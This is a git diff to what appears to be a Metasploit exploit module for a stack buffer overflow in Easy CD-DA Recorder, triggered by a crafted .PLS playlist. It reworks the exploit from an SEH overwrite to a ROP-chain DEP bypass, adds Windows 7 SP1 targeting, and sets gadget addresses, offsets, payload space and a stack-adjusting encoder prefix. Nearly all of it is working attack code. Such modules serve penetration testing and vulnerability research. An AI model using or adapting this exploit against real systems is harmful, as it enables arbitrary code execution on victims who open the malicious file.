diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
index a50f780a28..997edbfdda 100644
--- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
+++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
@@ -9,18 +9,17 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::FILEFORMAT
-  include Msf::Exploit::Seh
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Easy CD-DA Recorder 2007 PLS Buffer Overflow',
+      'Name'           => 'Easy CD-DA Recorder PLS Buffer Overflow',
       'Description'    => %q{
         This module exploits a stack-based buffer overflow vulnerability in
         Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
-
         By persuading the victim to open a specially-crafted .PLS file, a
         remote attacker could execute arbitrary code on the system or cause
-        the application to crash.
+        the application to crash. This modules has been tested successfully on
+        Windows XP SP3 and Windows 7 SP1.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -43,17 +42,21 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Payload'        =>
         {
-          'BadChars' => "\x0a\x3d",
-          'Space'    => 2559
+          'DisableNops'    => true,
+          'BadChars'       => "\x0a\x3d",
+          'Space'          => 2472,
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
         },
       'Targets'        =>
         [
-          [ 'Windows XP SP3 (DEP Bypass)',
+          [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
+            # easycdda.exe 3.0.114.0
+            # audconv.dll 7.0.815.0
             {
               'Offset' => 1108,
               'Ret'    => 0x1001b19b  # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
             }
-          ],
+          ]
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Jun 7 2010',
@@ -71,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote
     return make_nops(4).unpack("V").first
   end
 
-  def exploit
+  def rop_nops(n = 1)
+    # RETN (ROP NOP) [audconv.dll]
+    [0x1003d55d].pack('V') * n
+  end
 
-    rop_nop =
-    [
-      0x1003d55d   # RETN (ROP NOP) [audconv.dll]
-    ].flatten.pack('V*')
+  def exploit
 
     # ROP chain generated by mona.py - See corelan.be
     rop_gadgets =
@@ -100,15 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote
       0x00429692   # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
     ].flatten.pack('V*')
 
-    sploit =  rand_text_alpha_upper(target['Offset'])
-    sploit << generate_seh_record(target.ret)
-    sploit << rand_text_alpha_upper(80)
-    sploit << rop_nop
-    sploit << rand_text_alpha_upper(4)
+    sploit =  rop_nops(target['Offset'] / 4)
+    sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
+    sploit << [target.ret].pack("V")
+    sploit << rop_nops(22)
     sploit << rop_gadgets
     sploit << make_nops(4)
     sploit << payload.encoded
-    sploit << rand_text_alpha_upper(10000)
+    sploit << rand_text_alpha_upper(10000) # make it crash
 
     # Create the file
     print_status("Creating '#{datastore['FILENAME']}' file ...")